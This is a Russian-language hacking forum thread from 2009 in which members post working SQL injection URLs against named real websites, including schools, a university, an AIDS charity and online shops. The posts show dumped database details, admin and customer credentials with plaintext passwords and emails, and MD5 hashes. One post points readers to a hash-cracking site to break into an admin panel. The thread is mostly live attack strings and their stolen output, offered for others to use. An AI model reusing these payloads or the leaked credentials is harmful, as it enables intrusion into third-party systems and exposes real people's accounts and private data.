HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.05.2009, 19:00
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.qpc.edu.pk

Код:
http://www.qpc.edu.pk/news.php?id=19+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8
Версия - 5.0.67-community
Юзер - qpcedu_qpcadmin@localhost
БД - qpcedu_qpc

Табличка юзеры:

Код:
http://www.qpc.edu.pk/news.php?id=19+union+select+1,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8+from+t_user
 
Ответить с цитированием

  #2  
Старый 10.05.2009, 21:21
rushter
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858

Репутация: 979


Отправить сообщение для rushter с помощью ICQ
По умолчанию

Цитата:
http://www.bungarayanews.com/news.php?id=-232+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10--
bungaraya_admin@localhost:bungaraya_db:5.0.45-community-log
Цитата:
http://www.getawaytur.dp.ua/view_page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5--
getawaytur_admin@localhost:getawaytur_db:5.0.22
Цитата:
http://www.notacop.com/user/view_page.php?id=-7622+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,u ser(),database(),version()),10--
root@localhost:scam_spider_test:5.0.41-community-nt

Последний раз редактировалось rushter; 10.05.2009 в 21:55..
 
Ответить с цитированием

  #3  
Старый 10.05.2009, 21:33
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Ещё ЕДА
http://chick.cis.udel.edu/reactome_v3/update.php?ID=-373867+union+select+1,2,column_name,4,5+from+infor mation_schema.columns/*&PATH=71406&R=2
 
Ответить с цитированием

  #4  
Старый 10.05.2009, 22:18
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.cascadeaids.org {PR 5}
Код:
http://www.cascadeaids.org/page.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
5.0.27-max-log : cap: cap@localhost

tables:
Код:
http://www.cascadeaids.org/page.php?id=-1+union+select+group_concat(table_name)+from+information_schema.tables/*
 
Ответить с цитированием

  #5  
Старый 10.05.2009, 22:19
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.1arenda.ru/flat.php?idflat=-152+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
dbu_ooospark_1@192.168.8.82:db_ooospark_1:4.1.22
PR:4
тИЦ: 200
 
Ответить с цитированием

  #6  
Старый 10.05.2009, 22:39
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Код:
http://www.videofil.net.ua/prices.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8+from+users+--+
1:admin:b4d5caaf5ef14f659142515d1d7fe0a9
 
Ответить с цитированием

  #7  
Старый 10.05.2009, 23:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.catsmd.com/index.php?lang=ru&lnk=pomet.php?-4+union+select+1,2,3,concat_ws(0x3a,version(),data base(),useR(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16--


Database Version: 5.1.32
Database name: catsmdc_cats
User name: catsmdc_root@localhost
Os : portbld-freebsd7.0
 
Ответить с цитированием

  #8  
Старый 11.05.2009, 00:08
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.academianavigatio.org {PR 2}
Код:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.75-log : anavigatio : anavigatio@85.128.177.64

columns where table name user:
Код:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x75736572--
id,login,haslo,imie,nazwisko,data_utworzenia,prawo

columns info where table name user:
Код:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,id,login,haslo,imie,nazwisko,data_utworzenia,prawo),3,4,5,6,7,8,9,10,11,12,13,14,15+from+user--
1 : an : qwer1234 : ADMIN : ADMIN: 0000-00-00 : 1
 
Ответить с цитированием

  #9  
Старый 11.05.2009, 09:01
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://shop.solarstone.co.uk/products.php?cat_id=-37+union+select+1,2,3,4,5,group_concat(concat_ws(0 x3a,email,passwd))+from+solarsto_shop.customers--
Код:
alexnews@clevercherry.com:clevercherry
shop@solarstone.co.uk:mow321m!
rich@solarstone.co.uk:mow321m!
lesdeguzman@hotmail.com:crittur17
sachin@natsep.co.za:oakenfold
andrea.giacomoni@tiscali.it:0be7xzja
http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6,7,8--
Код:
4.1.22-standard:gjdrp_portal:gjdrp_portal@localhost

http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+group_concat(concat_ws(0x3a,login,pass)),2,3,4,5,6,7,8+from+users--

sergey2:qweqwe
bratello555:pass
report:qweqwe
bratello55:pass
bratello55:wertery2
http://www.abdn.ac.uk/r&i/support/print.php?id=-75+union+select+1,version(),3,4,5,6,7,8,database() ,10,11,12,user(),14--
Код:
woi001_fund@webserv2-7.abdn.ac.uk
5.0.37-community-log
woi001_fund
http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,user(),database(),versi on(),8,9,10,11,12,13,14,15,16,17--&act=print
Код:
ukart01_adrian@localhost
5.0.67-community
ukart01_ukart

http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,group_concat(concat_ws(0x3a,adminid,password)),6,7,8,9,10,11,12,13,14,15,16,17+from+dbs_admin--&act=print

admin:6ecef1648de55c0ad4e1dbc87116ea6c
 
Ответить с цитированием

  #10  
Старый 11.05.2009, 10:05
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR: 3

http://www.classic-zone.de/modding.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user ())--

4.1.22-max-log:v128336:v128336@localhost

########################################

http://www.admintalk.de/viewtips.php?id= 1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21--

5.0.32-Debian_7etch10-log:admintalk:Jann@localhost

куча таблов , выложу кусок:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--

atalk_tips,atalk_programme_os,atalk_programme_imag es,pot_user_agents,pot_hostnames,pot_accesslog,ata lk_programme_subcategory,atalk_programme_language, pot_visitors,atalk_bezug_os,pot_operating_systems, pot_add_data,atalk_statistics_referrer,atalk_progr amme_licence,atalk_bezug_sprache,pot_referers,pot_ documents,atalk_system_users,atalk_progra

(смареть все таблы через лимит)

взял таблу atalk_system_users:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(conc at_ws(0x3a,name,username,email,password)),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ata lk_system_users--

shadowsnake:admin:admin@admintalk.de:5840876be50d0 30815db1a392977205e,test6:test:admin@shadowsnake.d e:098f6bcd4621d373cade4e832627b4f6,Stefan:tty1:tty 1@gmx.net:fec0d60207dd5987e630ab4f6e47ba92,Burim:s uwan:master@xuwak.net:6b9260b1e02041a665d4e4a5117c fe16,Philipp:Philipphib89@web.de:0e219cdc17c98d1 f693492dfeabcbdcd


P.S какие то хеши есть в БД http://passcrackin g.ru/inde x.php так что вперед, тока у меня не получилось коннект в админку ))

Последний раз редактировалось HAXTA4OK; 11.05.2009 в 10:09..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ